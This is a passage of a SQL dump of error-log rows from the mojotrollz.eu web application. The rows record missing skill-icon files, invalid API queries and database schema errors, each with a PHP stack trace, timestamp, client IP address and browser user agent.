SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:44:38', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_ammo_firetar.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 71, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (695, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_shadowpact.png\' found.', '23c58f1a185bf9def50fd0d35e830dd7548dfebd', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_sh...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_sh...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:44:38', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_shadowpact.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 69, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (696, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_misc_gem_sapphire_01.png\' found.', '5cdd2da8fe9979226c3f8935741d7899343aa10a', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_misc_gem_sa...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_misc_gem_sa...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:44:38', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_misc_gem_sapphire_01.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 65, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (697, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_summonbuilding.png\' found.', '29750ffb5980c0773bf83cfe0f5bf9b23b712bc1', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_su...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_su...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:09:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_summonbuilding.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 6, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (698, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_curseofmannoroth.png\' found.', 'f048e4187f83e46f41fa741584ffc86180da6f0d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_cu...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_cu...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:44:38', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_curseofmannoroth.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 59, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (699, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_shadowbolt.png\' found.', 'cc88240d5eaa41e5d6f85b26cb46f51f5d196587', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_sh...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_sh...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:44:40', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_shadowbolt.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 53, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (700, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_windofwoe.png\' found.', 'a4ec83a6968ce950995ac146e1c0cdf1d45178f8', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_wind...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_wind...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:11:03', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_windofwoe.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (701, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_windsofwoe.png\' found.', '020858b39c47d1d2798802f24d94bc27bd053aec', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_wind...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_wind...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:44:40', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_windsofwoe.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 49, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (702, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_firebolt.png\' found.', 'fb5ea077bef96da122b998fc2643da4523df7f33', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_fire...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_fire...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:44:40', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_fire_firebolt.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 39, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (703, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_scourgebuild.png\' found.', 'd3b15caf7de17d9afb62d50368217773e254e87b', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_sc...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_sc...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:44:40', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_scourgebuild.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 33, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (704, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_lavaspawn.png\' found.', 'c2b918aa8f1edfa932fd6cb9f476b86e76e2c856', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_lava...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_lava...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:44:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_lavaspawn.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 30, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (705, 'SYSTEM\\LOG\\ERROR', 'No matching ID \' spell_fire_flameshock.png\' found.', '64676f6bfeb63a173485964410dce49e97702582', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \' spell_fire_fla...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \' spell_fire_fla...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:17:25', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=%20spell_fire_flameshock.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (706, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_corpseexplode.png\' found.', '441e2f3e5d7f49223558de1a429617e38b839768', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_co...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_co...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:44:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_shadow_corpseexplode.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 17, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (790, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418738969559', '4650d77335c6cb7ce7e6f65c46ee25e95d8c85e1', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.70.97', 0.004, '2014-12-16 15:09:38', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418738969559', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (793, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 7; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /web/mojotrollz/api.php?call=topic_create&parent_type=undefined&parent_id=undefined&relationflag=undefined&title=undefined&text=undefined&link=undefined', '710ebe6b44bf50a4325633c1a78f63de57258f09', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.242', 0.008, '2014-12-18 22:44:17', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=topic_create&parent_type=undefined&parent_id=undefined&relationflag=undefined&title=undefined&text=undefined&link=undefined', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (764, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: Unknown column \'value\' in \'field list\'', 'fb8df21d60672e17d783241df3807188fac5c2e3', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT map, val...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT map, val...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/api/map/map.php(7): SYSTEM\\DB\\QQ::QQ()\n#3 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(20): map::generate(1)\n#4 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature_action_creature(\'2\')\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#7 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#8 {main}', '37.24.148.242', 0.012, '2014-12-14 19:43:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=creature&id=2', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (708, 'Exception', 'Todo Statistics fix', '36f6d986c54f7b7c3f7d2124f589546ee1c54cf3', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Todo Statistics...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 04:07:16', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Todo%20Statistics%20fix', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (709, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Unknown column \'deletedInfos_Account\' in \'where clause\'', 'b918a4504cd81c5e70bd78a594841365a9a24b0c', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\TOOLTIP_PLA...\', \'SELECT guid, na...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\TOOLTIP_PLA...\', \'SELECT guid, na...\', Array)\n#2 /home/web/webdir/mojotrollz/system/db/qq/QP.php(26): SYSTEM\\DB\\QP::QQ(Array, NULL)\n#3 /home/web/webdir/mojotrollz/mojotrollz/api/database/tooltip/tooltip.php(16): SYSTEM\\DB\\QP::Q1(Array)\n#4 /home/web/webdir/mojotrollz/mojotrollz/api/api_mojotrollz.php(22): tooltip::html(\'6\', \'1\')\n#5 [internal function]: api_mojotrollz::call_tooltip(\'6\', \'1\')\n#6 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#7 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#8 {main}', '37.24.148.242', 0.048, '2014-12-14 18:08:36', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=tooltip&type=6&id=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 8, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (710, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Table \'mangos_zero_world.gameobjects\' doesn\'t exist', '2696d9992d340eab2e09125f08baa97a36b06b4c', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\MAP_OBJECTS\', \'SELECT guid as ...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\MAP_OBJECTS\', \'SELECT guid as ...\', Array)\n#2 /home/web/webdir/mojotrollz/system/db/qq/QP.php(18): SYSTEM\\DB\\QP::QQ(Array, NULL)\n#3 /home/web/webdir/mojotrollz/mojotrollz/api/map/map.php(34): SYSTEM\\DB\\QP::QA(Array)\n#4 /home/web/webdir/mojotrollz/mojotrollz/api/map/map.php(13): map::objects(\'1\')\n#5 /home/web/webdir/mojotrollz/mojotrollz/api/api_mojotrollz.php(20): map::positions(\'2\', \'1\')\n#6 [internal function]: api_mojotrollz::call_positions(\'2\', \'1\')\n#7 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#8 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#9 {main}', '37.24.148.242', 0.072, '2014-12-14 18:36:59', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=positions&type=2&map=1', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (711, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Table \'mangos_zero_world.creatures\' doesn\'t exist', 'c15943ef1a90379510738c32981c66f71ab1e023', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\MAP_CREATUR...\', \'SELECT guid as ...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\MAP_CREATUR...\', \'SELECT guid as ...\', Array)\n#2 /home/web/webdir/mojotrollz/system/db/qq/QP.php(18): SYSTEM\\DB\\QP::QQ(Array, NULL)\n#3 /home/web/webdir/mojotrollz/mojotrollz/api/map/map.php(38): SYSTEM\\DB\\QP::QA(Array)\n#4 /home/web/webdir/mojotrollz/mojotrollz/api/map/map.php(11): 